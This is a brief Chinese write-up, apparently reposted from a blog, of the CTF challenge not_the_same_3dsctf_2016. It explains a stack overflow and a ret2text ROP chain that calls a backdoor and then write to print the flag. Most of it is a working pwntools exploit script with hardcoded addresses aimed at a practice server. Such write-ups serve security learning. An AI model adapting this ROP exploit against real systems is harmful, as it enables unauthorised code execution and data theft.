pwn | not_the_same_3dsctf_2016
作者:互联网
not_the_same_3dsctf_2016
栈溢出ret2text rop
main
存在后门:
将文件写进bss段的全局变量
控制一下执行流程ret2write然后输出这个变量就行了
exp:
from pwn import *
import time
context.log_level = 'debug'
sh = remote('node4.buuoj.cn', 26446)
p_backdoor = 0x080489A0
p_fprintf = 0x08085950
p_write = 0x0806E270
p_exit = 0x0804E660
p_flag = 0x080ECA2D
# sh.recv()
payload = 0x2d * b'm' + p32(p_backdoor) + p32(p_write) + p32(p_exit)
payload += p32(1) + p32(p_flag) + p32(45)
sh.sendline(payload)
sh.interactive()
sh.close()
标签:3dsctf,same,write,p32,sh,pwn,2016,payload 来源: https://www.cnblogs.com/Mz1-rc/p/15569172.html